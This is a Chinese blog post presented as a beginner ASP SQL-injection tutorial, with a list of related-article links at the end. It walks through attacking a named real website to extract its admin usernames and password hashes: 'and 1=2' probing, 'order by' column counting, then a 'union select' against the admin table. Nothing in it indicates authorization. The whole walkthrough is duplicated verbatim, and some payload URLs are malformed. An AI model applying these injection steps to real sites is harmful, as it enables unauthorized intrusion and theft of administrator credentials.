ASP注入小白教程
2017-08-01 09:50
148 查看
24k纯纯纯纯小白注入教程(大牛绕道),本人实践得到,主要是从通过注入拿到网站后台的用户名和密码。目标站已挂。。。,大家不用尝试了。
网址:http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 百度得到
用and 1=2 查看是否存在漏洞。在网址后添加and 1=2看是否页面异常。
页面显示找不到文章,说明存在漏洞。我们继续
在网址后加上order by 1
查看是否有变化
再用order by 20看看是否有变化,仍然没有? 我们用30试试。
http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 order by 30有变化。
好的在30之前 我们就要29试试29也出错,那继续用28。
http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 order by 28正常,好的,28正常29出错
就说明是28了。
http://www.wuhouci.net.cn/Article_Print.aspArticleID=688 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
,19,20,21,22,23,24,25,26,27,28 from admin
以上是语句。
OK 出来了。接下来我们用username和password替换页面存在的数字。
到此用户名和密码都爆出来了,加密形式需要解密。注入之路结束。
网址:http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 百度得到
用and 1=2 查看是否存在漏洞。在网址后添加and 1=2看是否页面异常。
页面显示找不到文章,说明存在漏洞。我们继续
在网址后加上order by 1
查看是否有变化
再用order by 20看看是否有变化,仍然没有? 我们用30试试。
http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 order by 30有变化。
好的在30之前 我们就要29试试29也出错,那继续用28。
http://www.wuhouci.net.cn/Article_Print.asp?ArticleID=688 order by 28正常,好的,28正常29出错
就说明是28了。
http://www.wuhouci.net.cn/Article_Print.aspArticleID=688 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
,19,20,21,22,23,24,25,26,27,28 from admin
以上是语句。
OK 出来了。接下来我们用username和password替换页面存在的数字。
到此用户名和密码都爆出来了,加密形式需要解密。注入之路结束。
相关文章推荐
- 基础教程:视图中的ASP.NET Core 2.0 MVC依赖注入
- 使用ASP.NET Web Api构建基于REST风格的服务实战系列教程【四】——实现模型工厂,依赖注入以及格式配置
- ASP.NET 小白从零开始建站简易教程 (一)域名、虚拟主机、FTP上传文件
- ASP注入漏洞基础教程(二)
- 解读ASP.NET 5 & MVC6系列教程(7):依赖注入
- 解读ASP.NET 5 & MVC6系列教程(7):依赖注入
- 小迪教程第九天——ASP+ACCESS注入/HTTP头注入
- 使用ASP.NET Web Api构建基于REST风格的服务实战系列教程【四】——实现模型工厂,依赖注入以及格式配置
- 编写通用的asp防注入程序
- ASP.NET MVC 5 学习教程:Edit方法和Edit视图详解
- ASP.NET MVC 重点教程一周年版 第五回 ActionResult的其它返回值
- ASP注入
- Scott Mitchell 的ASP.NET 2.0数据教程之四十一::实现开放式并发
- 简单介绍一下asp.net中DataGrid的使用(视频教程)
- SQL注入天书—ASP注入漏洞全接触
- 浪曦视频在线的ASP.NET AJAX视频教程下载(转载)
- 【ASP.NET Web API教程】2.3 与实体框架一起使用Web API
- 简单的asp采集代码教程
- SQL注入天书 - ASP注入漏洞全接触
- 【ASP.NET Web API教程】4.3 ASP.NET Web API中的异常处理